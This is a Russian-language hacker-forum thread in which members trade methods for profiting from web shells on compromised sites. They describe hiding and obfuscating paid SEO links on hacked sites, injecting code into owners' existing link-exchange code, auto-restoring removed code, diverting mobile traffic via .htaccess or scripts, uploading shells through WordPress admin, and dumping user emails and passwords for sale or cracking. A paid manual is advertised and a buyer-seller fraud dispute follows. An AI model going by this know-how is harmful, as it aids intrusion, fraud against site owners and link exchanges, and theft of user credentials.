кстати у меня тоже было 2 таких сайта, которые в сапу приняли а в линкфид с ошибкой ... Для меня это так и осталось загадкой))

Кстати не знаю насколько актуально сейчас скрывать ссылки в сапе и линкфиде, потому что они добавили кнопку "пожаловаться" из за этого довольно быстро добавленные сайты должны уходить под статус модерация и с этим статусом у вас на сайте не могут покупать новые ссылки, пока вы не уберете скрытые ссылки ...

Jakeroid
09.05.2012, 18:22
кстати у меня тоже было 2 таких сайта, которые в сапу приняли а в линкфид с ошибкой ... Для меня это так и осталось загадкой))
Кстати не знаю насколько актуально сейчас скрывать ссылки в сапе и линкфиде, потому что они добавили кнопку "пожаловаться" из за этого довольно быстро добавленные сайты должны уходить под статус модерация и с этим статусом у вас на сайте не могут покупать новые ссылки, пока вы не уберете скрытые ссылки ...

Хм, если не скрывать ссылки - сильно палевно выйдет .

Live777
20.06.2012, 22:47
Не проходит проверку с твоим кодом на LinkFeed. Пишет: "код на главной странице не найден". Хотя он там 100% есть, даже сапа схавала и все работает.
Куда копать?

А что сапа долго работает с этим кодом , меня почему то решили кинуть с модерацией ,так еще и предупреждение выдали по поводу того что ссылки слишком спрятаны )))))

Bramin
01.07.2012, 22:53

ты хоть один сайт смог в линкфид добавить то?? с таким кодом.

меня вообще берут сомнения в твоей успешной работе на биржах.

Тема по скрытию ссылок нисколько не потеряла своей актуальности при грамотном подходе к этому делу.

Alex_DZ
02.07.2012, 16:46
Классная статья , жалко теперь многие вещи быстро попаляться и уже вряд ли можно будет таким образом монетизировать ))) Автору зачет, немного хоть стал получать прибыль в онлайне !!!

Rootz
02.07.2012, 23:13
Плюсую предыдущий пост, спасибо ТСу за подробный FAQ по монетизации шеллов, нашел для себя несколько актуальных пунктов.)

aleksandrt
03.07.2012, 19:02
Ребят подскажите пожалуйста, палевно или нет делать подмену кода adsense?

FlooP1k
03.07.2012, 23:04
ты хоть один сайт смог в линкфид добавить то?? с таким кодом.

А чем тебе код не нравится?? Смотри на дату создания темы, вполне возможно что уже пофиксили чисто скрипт и то я очень сомневаюсь, скорей проблема в кривых руках или кривых настройках сервера.

FlooP1k
03.07.2012, 23:07
Ребят подскажите пожалуйста, палевно или нет делать подмену кода adsense?

Лучше добавить еще один код где то в шаблоне, чем делать полную подмену, но adsense приносит копейки, сильно на нем не уживешься ...

Alex_DZ
05.08.2012, 11:23
Линкфид тоже стал палить что ссылки прячутся и так же как и сапа перекрывает кислород. Кто знает подскажите что нового можно думать в этом направление , что бы не получать баны и не оставлять деньги на аккаунте ? Или может есть еще какой либо новый способ монетизировать шеллы , если кто поделиться как (можно в личку ) готов заплатить за реально действующую схему .

METRuby601
18.08.2012, 02:05
вобщем как я понимаю только слив мобильного трафика работает и заливка дорвеев. ну ещё подмена контактной информации. кстати это прикольно придумал автор

spiderbuber
04.09.2012, 09:38
Новый способ монетизации шеллов

Есть еще один способ монетизации шеллов, который в паблике никогда не светился..

Возможно кто-то им и пользуется, но я придумал его сам.

Мои статы весьма скудные, т.к. нет подходящих доноров.

http://rghost.ru/40179851/image.png

Смысл темы может быть понятен и по скрину. Для тех, у кого большой запас трафистых РУ шеллов - это просто золотое дно..

FlooP1k
13.10.2012, 17:45
Есть еще один способ монетизации шеллов, который в паблике никогда не светился..
Возможно кто-то им и пользуется, но я придумал его сам.
Мои статы весьма скудные, т.к. нет подходящих доноров.
http://rghost.ru/40179851/image.png
Смысл темы может быть понятен и по скрину. Для тех, у кого большой запас трафистых РУ шеллов - это просто золотое дно..

с 28к загрузок всего 200$ оО в чем тогда суть? Это же очень мало ...

Есть же много других способов ? Готовится статья "Мастеркласс в монетизации шеллов - часть 2", отпишу еще о способах монетизации!

FlooP1k
13.10.2012, 22:23
Модератор или Админ, прощу закройте пожалуйста тему из за неактуальности.

FlooP1k
16.10.2012, 16:12
автор лох
криптованный ифрейм+связка=профит!!!!1

да кто нибудь даст этому наркоману бан или нет, уже достал во всех темах ...

nobel
12.12.2012, 20:06
когда появится вторая часть? хотелось бы почитать акнуальную инфу

acrid
02.03.2013, 13:17
когда появится вторая часть? хотелось бы почитать акнуальную инфу

поддерживаю..

Prior
04.03.2013, 17:02
Не дожидаясь второй части хочу поинтересоваться - есть у кого-нибудь инфа по поводу слива части мобильного трафика с шелла?

Интересуют способы реализации и партнерки куда лить.

Radiator
04.03.2013, 17:59
smspirat.com например

winstrool
04.03.2013, 22:49
Не дожидаясь второй части хочу поинтересоваться - есть у кого-нибудь инфа по поводу слива части мобильного трафика с шелла?
Интересуют способы реализации и партнерки куда лить.

можешь сливать, через htaccess через ява скипты, либо через свой код внедренный куда либо и использующийся во всех страницах...

P.S:ну а теперь вторая сторона вопроса, я к примеру как админ нахожу твой код, декриптую вслучае если он закриптован, выявляю партнерку на которую ты льешь, и у админов выясняю по иду твоему твои контакты данные, применяю СИ к тебе, выесняю твое место обитание и наказываю тебя, ты уверен что тебе это надо?

Prior
05.03.2013, 02:48
можешь сливать, через htaccess через ява скипты, либо через свой код внедренный куда либо и использующийся во всех страницах...
P.S:ну а теперь вторая сторона вопроса, я к примеру как админ нахожу твой код, декриптую вслучае если он закриптован, выявляю партнерку на которую ты льешь, и у админов выясняю по иду твоему твои контакты данные, применяю СИ к тебе, выесняю твое место обитание и наказываю тебя, ты уверен что тебе это надо?

Прокси, тор и формальный аттестат вебмани к примеру никто не отменял.

Конечно идеальных средст защиты не существует, но тут ИМХО слишком длинная цепочка должна быть.

Unknown
29.05.2013, 17:55
Дайте пожалуйста простые коды для других бирж ссылок (MainLink, SetLinks и тд) Очень надо

qaz
29.05.2013, 19:48
Дайте пожалуйста простые коды для других бирж ссылок (MainLink, SetLinks и тд) Очень надо

возьми на самих биржах

Unknown
29.05.2013, 19:54
Так делать сильно палевно, так как у них нужно в корень грузить папку с огромным количеством символов. А вот те коды, которые ТС выложил самое то, что нужно.

qaz
29.05.2013, 20:01
Так делать сильно палевно, так как у них нужно в корень грузить папку с огромным количеством символов. А вот те коды, которые ТС выложил самое то, что нужно.

он выложил тоже самое что и давали биржи, просто впихнул их в одни файл, возьми коды и сделай с ними туже самое, тут даже знаний пыхе не нужно

Unknown
29.05.2013, 20:07
он выложил тоже самое что и давали биржи, просто впихнул их в одни файл, возьми коды и сделай с ними туже самое, тут даже знаний пыхе не нужно

там другое малясь))

саповский файл с оф сайта весит 68 кб , а у ТСа сапа + линк = 40 кб

И ещё для оригинального кода сапы нужеа всякая дребедень: права, htaccess, и тд

qaz
29.05.2013, 20:28
там другое малясь))
саповский файл с оф сайта весит 68 кб , а у ТСа сапа + линк = 40 кб
И ещё для оригинального кода сапы нужеа всякая дребедень: права, htaccess, и тд

весит меньше потому что у него старая версия сапы, и никакой дребедени не нужно, просто вставляй весь код в вместо инклуда и инклудь всё готовое целиком

Unknown
29.05.2013, 20:31
весит меньше потому что у него старая версия сапы, и никакой дребедени не нужно, просто вставляй весь код в вместо инклуда и инклудь всё готовое целиком

лан, спс. Попробую.

jizzle
09.06.2013, 16:42
Чувствую, gold52 ждёт та же учесть, что и всех горехацкеров отсюда.

qaz
09.06.2013, 17:03
Чувствую, gold52 ждёт та же учесть, что и всех горехацкеров отсюда.

что ты имеешь в виду?

qaz
11.06.2013, 13:52
Ку, ссобственно сегодня написали из линк фида с таким текстом

Здравствуйте. Мы обнаружили, что на Ваших площадках скрываются ссылки оптимизаторов. Исправьте это или мы заблокируем Ваши площадки и вывод средств. Еще раз напоминаем: Категорически запрещается скрывать ссылки в любом его проявлении. В случае нарушения, мы оставляем за собой право удалить площадку и аккаунт веб-мастера, без выплат.

у кого какие мысли? кто может сталкивался? как можно скрыть ссылки и при этом чтобы админы не ругались?

romasjanXXL
11.06.2013, 14:19
Да никак. сам подумай купил ссылку а ее нет! тут же жалоба в сапорт. тем более если ты за нее исправно платил. надо прятать от модератора а не от оптимизатора =)

qaz
11.06.2013, 14:23
Да никак. сам подумай купил ссылку а ее нет! тут же жалоба в сапорт. тем более если ты за нее исправно платил. надо прятать от модератора а не от оптимизатора =)

ты сейчас сам себе перечишь)) а фишки когда ссылки при переходе из линк финда показываются(тоесть отслежевается реффер) а при простом заходе на сайт нет еще катит?

dean999
22.07.2013, 14:41
А можно такое сделать тока для http://www.trustlink.ru/?

FlooP1k
23.07.2013, 18:13
ты сейчас сам себе перечишь)) а фишки когда ссылки при переходе из линк финда показываются(тоесть отслежевается реффер) а при простом заходе на сайт нет еще катит?

Не знаю как линкфид, но на sape такое и не катило, они с самого начала сделали систему при которой если человек нажимает на ссылку, то редирект идет через левый сайт и в реферах оставляет его.

djumiksc
17.08.2013, 17:26
Ага ссылки палят буквально на второй день, даже заработать не успеешь.

Если есть у кого рабочий метод продажи ссылок в сапе и линкфиде велкам в личку.

P.S. На линкфиде кстати модерацию сайты прошли на ура, только вот за неделю ни одной ссылки не купили. Тиц от 30 до 400+

qaz
17.08.2013, 18:27
Если есть у кого рабочий метод продажи ссылок в сапе и линкфиде велкам в личку.

есть, ставлю не скрывая ссылки, админы замечают ссылки в футере редко, 10 к одному

djumiksc
17.08.2013, 19:04
А сам акк сапы не забанят, если будут жаловаться, что я продаю ссылки на чужом сайте?

qaz
17.08.2013, 19:06
А сам акк сапы не забанят, если будут жаловаться, что я продаю ссылки на чужом сайте?

а ты код обуфусцируй чтобы не знали что это сапа

djumiksc
17.08.2013, 19:39
У меня крупные сайты, если спалит, удалит (даже если не пожалуется саппорту сапы), поменяет доступ, удалит шелл, залатает дыры и так далее, то жаба будет давить. А рано или поздно по любому спалит ссылки. Надо , что б эти ссылки держались как можно дольше .

Есть варианты?

djumiksc
17.08.2013, 21:40
Трафа почти нет.

Поэтому и заинтересовался сапой.

qaz
17.08.2013, 21:54
У меня крупные сайты, если спалит, удалит (даже если не пожалуется саппорту сапы), поменяет доступ, удалит шелл, залатает дыры и так далее, то жаба будет давить. А рано или поздно по любому спалит ссылки. Надо , что б эти ссылки держались как можно дольше .
Есть варианты?

ну тогда грошь цена таким шеллам, удалит код - поставь снова, окапайся получше чтобы не вычистили

djumiksc
18.08.2013, 03:43
На линкфиде кто то продаёт ссылки? Кто скажет почему за неделю не куплено ни одной ссылки? Тиц 30-300+. Режим "Беззаботный", т.е. цену устанавливает система.

qaz
18.08.2013, 14:04
На линкфиде кто то продаёт ссылки? Кто скажет почему за неделю не куплено ни одной ссылки? Тиц 30-300+. Режим "Беззаботный", т.е. цену устанавливает система.

потому что режим дерьмо, на ручной переходи

djumiksc
18.08.2013, 19:07
Разобрался, спасибо.

FlooP1k
29.10.2013, 19:09
Для тех кому интересна тема с линкобиржами (которые снова набирают дикую актуальность) и WAP траффиком, был создан мануал в который вошли новые, свежие скрипты и постоянная поддержка по каждому пункту. Если кому интересно подробнее по ссылке (http://kidsec.ru/index.php)

qaz
29.10.2013, 20:11
Для тех кому интересна тема с линкобиржами (которые снова набирают дикую актуальность) и WAP траффиком, был создан мануал в который вошли новые, свежие скрипты и постоянная поддержка по каждому пункту. Если кому интересно подробнее по
ссылке (http://kidsec.ru/index.php)

а чё снова набирают?)) они свою актуальность вроде как и не теряли,

носчет написаного по ссылке

Линкобиржи(монетизация ТиЦевых шеллов) - возьмем актуальные sape, linkfeed, trustlink.

а чё sape и trustlink актуальные? на сапе в лучшем случае за месяц 10ток ссылок продашь, а на trustlink берут 1из10 сайтов, вобще придурошные

Хотелось бы сразу опровергнуть их слова, двумя старичками, которые даже не смотря на свои не большие показатели, до сих пор стабильно приносят не большой доход

ну это как повезёт, бывают ссылки в футере годами стоят и админы вобще не замечают, а бывает тормошатся сразу

С моим скриптом и способом эксплуатации никаких банов, никаких стуков, владелец сайта даже не поймет что мы монетизируем именно через биржи

а можно примерно узнать в чём способ заключается?

он заключатся только в том чтобы на ломаном сайте использовать переделаный скрипт который не похож на код бирж? впринципи ума нужно не много чтобы переделать скрипт, у меня даже валяется готовый скрипт который авторизовуется в линкфиде собирает ссылки, работает через прокладку, 30 безпалевных таких строчек, естественно никто и не подумает сразу на какую-то из перечисленых тобою бирж, твой способ только в этом заключается?

FlooP1k
29.10.2013, 20:42
а чё sape и trustlink актуальные? на сапе в лучшем случае за месяц 10ток ссылок продашь, а на trustlink берут 1из10 сайтов, вобще придурошные

сапа отлично выкупает ссылки, а если еще и сайт попадет в сеопульт, то за неделю будет 1к+ ссылок. TrustLink да отсеивает гавно сайты ...

а можно примерно узнать в чём способ заключается?
он заключатся только в том чтобы на ломаном сайте использовать переделаный скрипт который не похож на код бирж? впринципи ума нужно не много чтобы переделать скрипт, у меня даже валяется готовый скрипт который авторизовуется в линкфиде собирает ссылки, работает через прокладку, 30 безпалевных таких строчек, естественно никто и не подумает сразу на какую-то из перечисленых тобою бирж, твой способ только в этом заключается?

Там реализован способ беспалевного сокрытия ссылок, скрипт это лишь инструмент и естественно рассказаны все подводные камни с которыми вы можете столкнуться ...

VRUB
13.11.2013, 16:24
Кто брал мануал, хотелось бы отзывов!

romano36
18.11.2013, 17:50
Кто брал мануал, хотелось бы отзывов!

Поддерживаю, есть ли там стоящая информация?

qaz
18.11.2013, 18:47
Поддерживаю, есть ли там стоящая информация?

канечно нет, просто ставите на сайты переделаный скрипт и всё

FlooP1k
18.11.2013, 19:05
канечно нет, просто ставите на сайты переделаный скрипт и всё

ой как я люблю пи***лов, не зная что внутри уже рассказывать всем ...

В мануале реализован способ, скрипты это чисто инструмент.

heJiZzZ
19.11.2013, 11:56
ой как я люблю пи***лов, не зная что внутри уже рассказывать всем ...
В мануале реализован способ, скрипты это чисто инструмент.

Я хз какой там скрипт\способ, но у меня простой и банальный код в футере без скрытия живет с 2012 года на 20 сайтах. На парочке сайтов правда пару-тройку раз админ убирал код, я его в другое место переставил и все. Все живет - припевает.

qaz
19.11.2013, 12:21
Я хз какой там скрипт\способ, но у меня простой и банальный код в футере без скрытия живет с 2012 года на 20 сайтах. На парочке сайтов правда пару-тройку раз админ убирал код, я его в другое место переставил и все. Все живет - припевает.

анологично, банальная обфускация кода и никих намёков на биржу = никаких абуз

FlooP1k
19.11.2013, 20:11
Сразу видно что вы не работали с объемом, вообще на каждом 3-м сайте снимают ссылки через несколько дней если не скрывать ссылки. Если у вас 20 сайтов одного овнера то еще смогу поверить, но если они от разных вебмастеров, то это сказка чистой воды или же вначале добавлялось сайтов 50+ и из них остались только 20 ...

Раз на раз не приходится. Могут заблокировать один сайт и после этого попросить новую фишку подтвердить все остальные сайты по whois e-mail иначе блок на вывод.

А если скрывать просто все ссылки, то будет стук от оптимизаторов и получите так же бан.

qaz
19.11.2013, 21:44
Сразу видно что вы не работали с объемом,

чё те там видно? у меня 3 ака, на одном 40 сайтов, на втором 50, на третем 70

вообще на каждом 3-м сайте снимают ссылки через несколько дней если не скрывать ссылки.

бред, снимают, но шанс этого 20 - 30 процентов, и то решается это легко, в какой ни буть файл дописывается кусок кода который проверяет наличие кода биржи в нужном месте, и если его убрали то обновляет файл, выручает всегда,

особенно хорошо если уже например стоит сапа, я в еёже код пихаю свой и тогда вобще всё как по маслу.

Могут заблокировать один сайт и после этого попросить новую фишку подтвердить все остальные сайты по whois e-mail иначе блок на вывод.

и чё что блок на вывод? был один случай когда только начинал, меня локнули за скрытие ссылок(линкфид), банально меняю кош в аке на левый, сайты удаляю, регаю новый акк, в него пишу свой кош и теже сайты = профит)) они там походу вобще незачем не следят

А если скрывать просто все ссылки, то будет стук от оптимизаторов и получите так же бан.

ну правильно, их никто и не скрывает))

Mdccalex
28.11.2013, 22:15
Всё решено извиняюсь)

FlooP1k
30.11.2013, 08:31
Купил у человека мануал по заработку на шеллах,задал массу вопросов так как в мануале не было пояснений,в процессе работы выяснил что тема не работает просил помощи разобраться за это был постоянный игнор,прошу вернуть деньги и затраты мои

Честно это самый глупый и неадекватный человек с которым мне доводилось общаться, я ему пол часа пытался объяснить что такое шелл, потом еще час он меня выпрашивал как залить шелл с админки вордпресс, я уже и на пальцах показывал и скидывал ссылки на разные посты, просто 0 такое ощущение что человек не читает что ему пишут.

Я говорю что бы залить шелл пропишите путь и т.д. и т.п. В ответ слышу как залить шелл, куда клацать?

Я бы скинул разговор, но из за спаленных в нем темах не могу выкладывать. Вот один из разговоров, это самое элементарное человек пытался заменить ссылку на прокладке на свою:

[PHP]
[COLOR="#0000BB"]---------------------------------------

FlooP(00:05:08 24/10/2013)

вот же 2 строчки:

ссылке

Обновить

http://sait.ru/ заменяем на свою

-------------------------------------->-

FlooP(00:05:19 24/10/2013)

мидлеты всегда в бане ант ивирусов

---------------------------------------

FlooP(00:07:01 24/10/2013)

Alex(00:01:34 24/10/2013)

у вас лежит шаблон лендин га в папке wap открываете i ndex.html через блокнот и там вставляете

Alex(00:01:43 24/10/2013)

там это где именно?

FlooP(00:07:47 24/10/2013)

папку:wap\лендинг

FlooP(00:07:49 24/10/2013)

???

--------------------------------------ссылкеэтого нет там

FlooP(00:10:23 24/10/2013)

как нету???скиньте что там есть я не понимаю что вы вообще открываете?

FlooP(00:11:58 24/10/2013)

скиньте скрин я честно не понимаю

--------------------------------------

FlooP(00:12:43 24/10/2013)

ну да и ищите там sait.ru вы просто плохо смотрите

FlooP(00:12:51 24/10/2013)

или нажмите в блокноте по иск если так тяжело

FlooP(00:16:22 24/10/2013)

выключите каспер и обнови те вам выдаст ссылку

[COLOR="#007700"]--------------------------------------

Mdccalex
01.12.2013, 23:08

Грабитель
02.12.2013, 00:26
и чё что блок на вывод? был один случай когда только начинал, меня локнули за скрытие ссылок(линкфид), банально меняю кош в аке на левый, сайты удаляю, регаю новый акк, в него пишу свой кош и теже сайты = профит)) они там походу вобще незачем не следят

В линкфиде если сайты заблочены за скрытые ссылки, ты никаких действий не сделаешь, не удалить из системы, ничего.

Mdccalex
02.12.2013, 01:09

winstrool
02.12.2013, 13:54
Выкладывайте что там за скрипты?, посмотрим что к чему!)

По поводу купли продажи мануалов, в любом случае покупатель должен иметь базовые знания, мало купить кнопку бабло, помимо этого надо хотя бы проявить старание для того чтоб ее еще нажать!

Mdccalex
02.12.2013, 21:11
Возможно мне нехватило знаний для начала,ничего выкладывать не буду решу приватно.

Mdccalex
07.12.2013, 19:01
Разобрались,курс рабочий ,приношу извинения ,но на новичков не расчитан есть немного лишнего.

winstrool
07.12.2013, 21:14
Разобрались,курс рабочий ,приношу извинения ,но на новичков не расчитан есть немного лишнего.

Любая подобная тематика не рассчитана на новичка, и требует базовых пониманий вещей, нет понимания куда лезишь, нефиг лезть!

P.S: Т.С по курсу я все же бы заценил технику, но нет желании покупать.

Mobile
21.01.2014, 14:18
Это раздел "Статьи", а не торговля. Заканчивайте здесь обсуждать торговые моменты, иначе закрою тему.

mikerays
06.02.2014, 19:11
очему на сайте выводятся ссылки только с сапы, а с линкфида нет... Настроил все верно. А на сайтах которые я добавил только в линкфид (без сапы) работает нормально.

galabba
08.02.2014, 15:04
бред, снимают, но шанс этого 20 - 30 процентов, и то решается это легко, в какой ни буть файл дописывается кусок кода который проверяет наличие кода биржи в нужном месте, и если его убрали то обновляет файл, выручает всегда,
особенно хорошо если уже например стоит сапа, я в еёже код пихаю свой и тогда вобще всё как по маслу.

а если это код сапы владельца сайта, он что не чухается?

qaz
08.02.2014, 16:46
а если это код сапы владельца сайта, он что не чухается?

сам понял что спросил?

galabba
08.02.2014, 18:03
особенно хорошо если уже например стоит сапа, я в еёже код пихаю свой и тогда вобще всё как по маслу

ну вот вы писали, если стоит код сапы, вы пихаете в него свой. а если этот код сапы самого владельца сайта, а не хозяина шелла?

qaz
08.02.2014, 18:15
ну вот вы писали, если стоит код сапы, вы пихаете в него свой. а если этот код сапы самого владельца сайта, а не хозяина шелла?

какого нафиг хозяина шелла, я пихаю свой код в код сапы принадлежащий владельцу сайта, не тупи

galabba
08.02.2014, 18:45
может я на самом деле совсем тупая) владелец сайта поставил себе код сапы, вы ставите вместо него свой, он что, разве не замечает, что у него доход с сапы перестал идти?

qaz
08.02.2014, 19:28
может я на самом деле совсем тупая) владелец сайта поставил себе код сапы, вы ставите вместо него свой, он что, разве не замечает, что у него доход с сапы перестал идти?

я не ствлю вместо его сапы свою сапу, я ставл В КОД сапы код другой биржи

FlooP1k
24.02.2014, 15:20
Многие покупали с античата, поэтому оставлю здесь сообщение потому что достучаться до них не могу.

UPDATE 24.02.2014

Вышло глобальное обновление скриптов и многие нововведения, что бы тут тему на засорять, читайте всю информацию по ссылке (http://kidsec.ru/)

konst55
25.02.2014, 12:33
Мейлы:
Но не только базы интернет шопов у буржуев ценятся, можно слить userов нас интересует только емейл и пароль, если пароль в открытом в виде то супер получаем от 5$ за 1к пользователей, если зашифрован то тут уже ищем проги
для масс брута.

Не понял этого момента. Пассы от мейлов имеются в виду? Но откуда им взяться там? Если нет, то кому нужны логины и пароли на вход от какого-то непонятного сайтика, чтобы 5 $ за 1к давать?

FlooP1k
25.02.2014, 14:26
Не понял этого момента. Пассы от мейлов имеются в виду? Но откуда им взяться там? Если нет, то кому нужны логины и пароли на вход от какого-то непонятного сайтика, чтобы 5 $ за 1к давать?

У большей части людей 1 пароль на все случаи жизни, поэтому практически у всех пароль на вход такой же, как на емейл ...

konst55
25.02.2014, 20:13
А вот тут не соглашусь. По опыту на всякие форумы и гесты ставят элементарные пароли: вроде 123 и т.д. числа вообще рулят. А вот от мыл уже посерьезнее

FlooP1k
25.02.2014, 22:20
форумы и гесты ставят элементарные пароли: вроде 123 и т.д.

В бурже такого по меньше, но конечно же на развлекательных тематиках такое бывает. Но в развлекательных и базы по более будут так что если с 1кк будет даже 5-10% то уже получите больше чем если бы вы его просто продали на трафф.

Тем более сейчас более хитрые спаммеры даже скупают базу чисто емейлов, что бы рассылать письма якобы от владельцев ресурсов CTR повышается в разы ...

makintoh
17.03.2014, 15:32
монитезация

скинь аську в пм есть пару вопросов и желание преобристи скрипты

FlooP1k
06.04.2014, 17:06
скинь аську в пм есть пару вопросов и желание преобристи скрипты

Там на сайте kidsec.ru есть мои контакты, если что ...

romano78
06.04.2014, 20:29
Там на сайте kidsec.ru есть мои контакты, если что ...

Стучусь в асю уже пару недель, а в ответ тишина, может можно как то получить обновление от 24.02.2014???

djumiksc
07.04.2014, 09:51
По сколько сайтов можно в каждую биржу ставить?

sara_luc
11.04.2014, 11:29
По сколько сайтов можно в каждую биржу ставить?

хоть сколько

FlooP1k
16.04.2014, 05:26
Стучусь в асю уже пару недель, а в ответ тишина, может можно как то получить обновление от 24.02.2014???

Я вообще все время в ICQ, не знаю как вы писали, может по каким то причинам вы у меня в игноре и то врядли ... Если еще нужно отпишите в ПМ свою ICQ я вам напишу.

norbiq
01.05.2014, 21:04
Я вообще все время в ICQ, не знаю как вы писали, может по каким то причинам вы у меня в игноре и то врядли ... Если еще нужно отпишите в ПМ свою ICQ я вам напишу.

Отписал вам в ПМ.

Аналогично не могу к вам достучаться порядка 2-х недель.

METRuby601
02.05.2014, 02:40
тоже в асе ТС не отвечает. хотя помню как то раньше общались.

кто-то уже брал курс? отзывы есть?

norbiq
07.05.2014, 13:43
Кто уже покупал курс, помогите связаться с автором.

Все время молчит в асе.

И адрес форума дайте пожалуйста.

FlooP1k
07.05.2014, 14:59
Кто уже покупал курс, помогите связаться с автором.
Все время молчит в асе.
И адрес форума дайте пожалуйста.

Блин какой уже раз говорю если хотите ответ задавайте развернутый вопрос, а не "ты тут?" и т.д. Я в первую очередь отвечаю тем кто у меня в списке покупателей в qip, поэтому иногда времени на остальных не остается ...

Мефистофель
09.05.2014, 19:08
Не рекомендовал бы работать с человеком. И вот почему:

На сайте kidsec.ru я увидел скрипт который предлагает работать с биржей MiraLinks, из за этой биржи я и приобрел скрипт, но в архиве так и не нашёл никакой информации по работе с этой биржей.

Начал стучать к нему в аську, несколько недель не мог достучаться, чтобы просто распросить про отсутствие кода.

Сегодня после того как я оставил ему в аське сообщение "будешь игнорить - напишу блек", моментально ответил, вот диалог:

Добрый день, приобрел у вас ваш код бирж за 3 тысячи рублей, но не нашёл в нем никакой информации по бирже miralinks ради которой я собственно и покупал скрипт, подскажите где её найти, может быть я не там смотрю?
17:49:38 FlooP:
Какой миралинкс? Речь шла о маинлинкс
17:51:32 -:
http://kidsec.ru/index.php
1) Добавлена новая биржа MiraLinks
с темы то не съезжай.
17:53:05 FlooP:
Опечатка
17:53:18 -:
да что ты.
17:53:52 -:
я из за этой "опечатки" и купил скрипт, так как давно хотел пробраться к этой бирже, а теперь ты заявляешь что это всего лишь опечатка?
17:53:59 -:
это кидок, дружок.
17:54:24 FlooP:
Мне даже впадоу отвечать неадекватам
17:54:34 -:
ок, пишу блек
17:54:36 -:
удачи
17:54:59 FlooP:
Господи, так похер вообще
17:55:19 -:
то есть ты открыто заявляешь что занимаешься кидками?
17:55:51 FlooP:
Я занят
17:55:59 -:
о как
17:56:18 -:
ладно, не отвлекаю.

Все оставляю на ваше усмотрение, работать с ним или не работать.

METRuby601
09.05.2014, 22:57
Не рекомендовал бы работать с человеком. И вот почему:
На сайте kidsec.ru я увидел скрипт который предлагает работать с биржей MiraLinks, из за этой биржи я и приобрел скрипт, но в архиве так и не нашёл никакой информации по работе с этой биржей.
Начал стучать к нему в аську, несколько недель не мог достучаться, чтобы просто распросить про отсутствие кода.
Сегодня после того как я оставил ему в аське сообщение "будешь игнорить - напишу блек", моментально ответил, вот диалог:

Добрый день, приобрел у вас ваш код бирж за 3 тысячи рублей, но не нашёл в нем никакой информации по бирже miralinks ради которой я собственно и покупал скрипт, подскажите где её найти, может быть я не там смотрю?
17:49:38 FlooP:
Какой миралинкс? Речь шла о маинлинкс
17:51:32 -:
http://kidsec.ru/index.php
1) Добавлена новая биржа MiraLinks
с темы то не съезжай.
17:53:05 FlooP:
Опечатка
17:53:18 -:
да что ты.
17:53:52 -:
я из за этой "опечатки" и купил скрипт, так как давно хотел пробраться к этой бирже, а теперь ты заявляешь что это всего лишь опечатка?
17:53:59 -:
это кидок, дружок.
17:54:24 FlooP:
Мне даже впадоу отвечать неадекватам
17:54:34 -:
ок, пишу блек
17:54:36 -:
удачи
17:54:59 FlooP:
Господи, так похер вообще
17:55:19 -:
то есть ты открыто заявляешь что занимаешься кидками?
17:55:51 FlooP:
Я занят
17:55:59 -:
о как
17:56:18 -:
ладно, не отвлекаю.

Все оставляю на ваше усмотрение, работать с ним или не работать.

а другие биржи были? форум там есть?

FlooP1k
10.05.2014, 03:00
Господи как же надоели такие люди, это просто не передать. Которые найдут какую то помарку в описании и скажут "чувак у тебя там написано такое, а вы дали немного не такое. Все давайте money-back". По шеллам такие редко встречаются, но по другим темам с более широкой аудиторией таких пруд пруди, уже все нервы на них извел ...

P.S. Ну причем тут вообще miralinks? Это полностью идентичная система GGLу, только со статьями. И с чего бы мне добавлять эту биржу в основной код, если у них даже скрипта нет? Это даже технически - просто абсурд ...

Если вы брали б только из за этой биржи вы бы поняли по описанию, что оно не подходит к miralinks и могли бы уточнить в ICQ.

Ко мне обращаются действительно с актуальными проблемами, а на таких как вы у меня времени просто нет. Любители сделать из мухи слона: "Вы подтверждаете что это кидок?", "Вы специально сделали эту опечатку, что бы такие как я теряли деньги?" - ну что за детский сад ...

Я бы смог подсказать на счет miralinks, че то посоветовать, рассказать нюансы и подводные камни при работе с шеллами в этой биржи, раз уже так получилось. Но когда человек начинает диалог сразу с притензии и походу разговор ведет, как быдло, для таких я поблажек не делаю ...

McNamara
16.05.2014, 14:24
Господи как же надоели такие люди, это просто не передать. Которые найдут какую то помарку в описании и скажут "чувак у тебя там написано такое, а вы дали немного не такое. Все давайте money-back". По шеллам такие редко встречаются, но по другим темам с более широкой аудиторией таких пруд пруди, уже все нервы на них извел ...
P.S. Ну причем тут вообще miralinks? Это полностью идентичная система GGLу, только со статьями. И с чего бы мне добавлять эту биржу в основной код, если у них даже скрипта нет? Это даже технически - просто абсурд ...
Если вы брали б только из за этой биржи вы бы поняли по описанию, что оно не подходит к miralinks и могли бы уточнить в ICQ.
Ко мне обращаются действительно с актуальными проблемами, а на таких как вы у меня времени просто нет. Любители сделать из мухи слона: "Вы подтверждаете что это кидок?", "Вы специально сделали эту опечатку, что бы такие как я теряли деньги?" - ну что за детский сад ...
Я бы смог подсказать на счет miralinks, че то посоветовать, рассказать нюансы и подводные камни при работе с шеллами в этой биржи, раз уже так получилось. Но когда человек начинает диалог сразу с притензии и походу разговор ведет, как быдло, для таких я поблажек не делаю ...

24 февраля прошло крупное обновление всех скриптов и добавлены нововведения.

Подробнее:

>>

Флуп, ну у тебя в описании продукта реально написанна MiraLinks, мб у тебя тогда опечатка не в слове, а в обзаце?

METRuby601
21.05.2014, 19:17
а отзывов почему нет?

Грабитель
22.05.2014, 02:46
Флуп, ну у тебя в описании продукта реально написанна MiraLinks, мб у тебя тогда опечатка не в слове, а в обзаце?

Он слишком занят, чтобы отвечать на глупые вопросы.

Тоже имел дело с ТС, впечатления весьма неприятные, на некоторые вопросы так-же как и каждый второй в этой теме не могу получить ответа, но видимо дело персонально "во мне".

sonic - купи его скрипт, поработай, напишешь свой отзыв, в чем особая проблема?

galabba
22.05.2014, 10:51
24 февраля прошло крупное обновление всех скриптов и добавлены нововведения.

Да опечатка, там биржа mainlink, но ссылки после сноса работать не будут, биржа реагирует сразу

FlooP1k
23.05.2014, 15:33
Он слишком занят, чтобы отвечать на глупые вопросы.
Тоже имел дело с ТС, впечатления весьма неприятные, на некоторые вопросы так-же как и каждый второй в этой теме не могу получить ответа, но видимо дело персонально "во мне".
sonic - купи его скрипт, поработай, напишешь свой отзыв, в чем особая проблема?

Всех купивших я заношу в специальный список в ICQ и отвечаю всем из этого списка в приоритете, единственная запинка у меня QIP не давно работал с перебоями буквально 2 недели до меня вообще достучаться не возможно было. И я не отвечаю на вопросы "тут?", "как прийдешь отпиши" и т.д. Все время говорил хотите ответ, пишите вопрос.

